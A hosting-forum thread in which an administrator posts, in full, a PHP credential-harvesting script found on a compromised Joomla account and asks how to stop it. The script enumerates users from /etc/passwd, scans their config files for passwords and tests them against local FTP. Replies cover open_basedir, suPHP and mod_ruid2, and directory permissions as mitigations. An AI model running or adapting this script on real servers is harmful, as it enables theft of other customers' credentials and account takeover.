Found a scanfile by a hacked user that scan user configs with suPHP etc on

A

astra

Verified User
Joined
Mar 4, 2009
Messages
94
Hi,

We found some scanfile by a hacked joomla customer on one of our servers.

It is a bit strange because the servers run on suPHP / open_basedir on / allow_url_fopen Off / disable_functions exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source.

There scan into /home/$user/public_html/ for

Code: 
($file=='config.php')
or ($file=='config.inc.php')
or ($file=='config.backup.php')
or ($file=='conf.php')
or ($file=='settings.php')
or ($file=='configuration.php')
or ($file=='wp_config.php')
or ($file=='wp-config.php')
or ($file=='inc.php')
or ($file=='setup.php')
or ($file=='dbconf.php')
or ($file=='dbconfig.php')
or ($file=='db.inc.php')
or ($file=='dbconnect.php')
or ($file=='connect.php')
or ($file=='index.php')
or ($file=='common.php')
or ($file=='configure.php')
or ($file=='config_global.php')
or ($file=='db.php')
or ($file=='connect.inc.php')
or ($file=='dbconnect.inc.php'))

The problem is lazy customers use the same db password as there DA login password :confused: and the hackers login on the user account and starts sending spam.

Is there away to eliminate this scans?

The scan file code:

Code: 
<?php
echo '<html><head><title>Config finder</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
$str = fgets($passwd);
if ($i > 35)
{
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
}
$i++;
}
###################
echo '<br><br><textarea cols="100" rows="20">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo "[~] ".print_r($users)." Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
$path = "/home/$user/public_html/";
read_dir($path,$user);
}
echo "\n[+] Finished\n";
function read_dir($path,$username)
{
if ($handle = opendir($path))
{
while (false !== ($file = readdir($handle)))
{
$fpath = "$path$file";
if (($file != '.') and ($file != '..'))
{
if (is_readable($fpath))
{
$dr = $fpath."/";
if (is_dir($dr))
{
read_dir($dr,$username);
}
else
{
if (
($file=='config.php')
or ($file=='config.inc.php')
or ($file=='config.backup.php')
or ($file=='conf.php')
or ($file=='settings.php')
or ($file=='configuration.php')
or ($file=='wp_config.php')
or ($file=='wp-config.php')
or ($file=='inc.php')
or ($file=='setup.php')
or ($file=='dbconf.php')
or ($file=='dbconfig.php')
or ($file=='db.inc.php')
or ($file=='dbconnect.php')
or ($file=='connect.php')
or ($file=='index.php')
or ($file=='common.php')
or ($file=='configure.php')
or ($file=='config_global.php')
or ($file=='db.php')
or ($file=='connect.inc.php')
or ($file=='dbconnect.inc.php'))
{
$pass = get_pass($fpath);
if ($pass != '')
{
echo "[+] $fpath\n$pass\n";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link)
{
@$config = fopen($link,'r');
while(!feof($config))
{
$line = fgets($config);
if (strstr($line,'pass')
or strstr($line,'pwd')
or strstr($line,'db_pass')
or strstr($line,'password')
or strstr($line,'DB_PASSWORD')
or strstr($line,'dbpass')
or strstr($line,'passwd'))
{
if (strrpos($line,'"'))
{
preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
$pass = str_replace("]=\"","",$pass);
}

else
preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
$pass = str_replace("]='","",$pass);
return $pass[2];
}
}
}
function ftp_check($login,$pass)
{
@$ftp = ftp_connect('127.0.0.1');
if ($ftp)
{
@$res = ftp_login($ftp,$login,$pass);
if ($res)
{
echo '[FTP] '.$login.':'.$pass." Success !\n";
}
else ftp_quit($ftp);
}
}
echo '</textarea><br><br>scan config files</body></html>';
?>

Thanks for your feedback.
 
Thats not the problem, there scan the config files and gamble the passwords from the customers DA login.

I hope some one know a solution to stop scanning config files from other customers in the /home/* to guess there password and login to the control panel.

And yeah its pretty stupid from the customers to use the same password for mysql and DA login, but what will you do to it :o
 
No but I would suggest to remove the script or at least a big part of it before scriptkiddies are going to have a ball with it.
 
Spam apart, have you any evidence that that scan is really working and checking other users?

Also, have you checked owner/group of this file? If isnt root and you permission are not wrong, maybe that script is not sending other users config anywhere cause have not access to them, otherwise, as zeiter sayd, you got some permission error or missconfigurations.

Regards
 
Yeah i have copy past the code into another server and run it via www.domain.com/cp.php and it scans to all the users there config files and past the passwords back to the cp.php script.

Be free and test the script by you self and see if it works on your server.

Its strange this script works, but scripts like c99 shell hack panels etc do not work under suphp and i am glad with that, but i am not happy with this and hope some know howto block it.
 
Last edited:
On my server with mod_ruid2 this is the output: [-] Error : coudn`t read /etc/passwd

I suggest you to check/reinstall suphp or pass to mod_ruid2

Regards
 
SeLLeRoNe said:
On my server with mod_ruid2 this is the output: [-] Error : coudn`t read /etc/passwd

I suggest you to check/reinstall suphp or pass to mod_ruid2

Regards
Click to expand...


I doubt your /etc/passwd can not be read because of suphp/mod_ruid2, that must be caused by the fact of using open_basedir restriction.

What's your permissions on /etc/passwd ?
 
Oh, right.

passwd file is 644

Code: 
>ll /etc/passwd
-rw-r--r-- 1 root root 7,1K  9 ago 11:54 /etc/passwd

I can confirm that without openbasedir this script work, but, just found one user data from 120...

Actually the only user found had public_html at 755, put it on 711 made impossible to view inside and the script is unable to find any users.

Thanks zeiter for the tip.

astra, check for your public_html folders to be 711

Regards
 
With group access homedirs /home/username should be 710 and it should not really matter what permissions are set on public_html if you're using mod_ruid/suPHP.
 
oh, right again, that user had no 710 on /home/username...

But, set 710 to public_html should be a little more useful step for security or you think should cause problems?

Regards
 
It depends on who is owner of a public_html, if your public_html belongs to username:username, then apache should still have access into it, and in this case it should be 755. if your public_html belongs to username:access, then 750 or 710 would be enough, I think.
 
Ive checked that, public_html is owned by user:user and have 710 permission and website seems to be correctly working, so, should be ok keep 710 to public_html too i think

Regards
 
Note, you're using mod_ruid, and all Apache requests should be done from username, not Apache, not group access. But the topic starter is still using mod_suphp so am I.
 
You must log in or register to reply here.
Back
Top